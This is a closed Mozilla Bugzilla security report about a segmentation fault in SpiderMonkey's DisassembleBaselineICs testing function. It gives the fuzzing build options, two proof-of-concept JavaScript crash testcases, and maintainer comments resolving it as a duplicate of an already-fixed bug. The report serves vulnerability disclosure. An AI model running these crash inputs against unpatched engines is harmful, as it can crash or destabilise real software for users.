Closed Bug 1938914 Opened 2 months ago Closed 1 month ago

SEGV gecko-dev/js/src/builtin/TestingFunctions.cpp:1933:5 in DisassembleBaselineICs(JSContext*, unsigned int, JS::Value*)

Categories

(Core :: JavaScript Engine, defect)

Tracking

RESOLVED DUPLICATE of bug 1937430

People

(Reporter: ddme, Unassigned)

Details

(Keywords: reporter-external, Whiteboard: [client-bounty-form])

Attachments

(1 file)

Attached file asan.txt

Working on 22a0993169acd84ab8d574fefddcb4da04b77c91, built with:

ac_add_options --enable-application=js
ac_add_options --enable-optimize
ac_add_options --enable-debug
ac_add_options --disable-shared-js
ac_add_options --enable-js-fuzzilli
ac_add_options --enable-fuzzing
ac_add_options --enable-gczeal

and run with --ion-eager.
PoC:

class C1 {
    ["XN"];
}
const v3 = -String;
gczeal(14);
x = [v3,v3,v3];
const v10 = new Uint8Array();
Array.prototype.push.call(x, v10);
function f16() {
    try {
        y.toString();
    } catch(e19) {
    }
    for (const v23 of [null,0]) {
        function f24() {
            const v25 = this;
            v25.disblic(f24);
            class C27 {
            }
            const v28 = C27.bind();
            try { v28(v25, v23); } catch (e) {}
            return v28;
        }
        f24();
    }
    return String;
}
Array.prototype.some.call(x, f16);
gc();
Flags: sec-bounty?

The other one:

gczeal(14);
new Uint8Array();
for (const v7 of [null]) {
    function f8() {
        const v9 = this;
        v9.disblic(f8);
        class C11 {
        }
        const v12 = new C11();
        v12.__proto__;
        return f8;
    }
    const t12 = f8();
    t12();
}
gc();
Group: firefox-core-security → javascript-core-security
Component: Security → JavaScript Engine
Product: Firefox → Core
Flags: needinfo?(iireland)

This is unlikely to qualify for a bug bounty if the problem is in the testing functions. The js shell is handy for testing, but not technically covered by the bug bounty program -- the bugs have to exist in Firefox itself. Make sure you're using the fuzzing-safe arguments, which turn off a lot of the extra functionality so the environment is closer to what a web page sees in Firefox. For help, check in the #fuzzing room on our Matrix server: https://chat.mozilla.org

Hi, I have tested that it can be triggered with --ion-eager --fuzzing-safe.

This is a duplicate of bug 1937430. The reported failing build (22a0993169acd84ab8d574fefddcb4da04b77c91) does not contain the fix. (It looks like it landed later in the day on the 20th).

I reproduced the crashes on an older build, and verified that both testcases pass in an up-to-date build.

Group: javascript-core-security
Status: UNCONFIRMED → RESOLVED
Closed: 1 month ago
Duplicate of bug: 1937430
Flags: needinfo?(iireland)
Resolution: --- → DUPLICATE
Flags: sec-bounty? → sec-bounty-
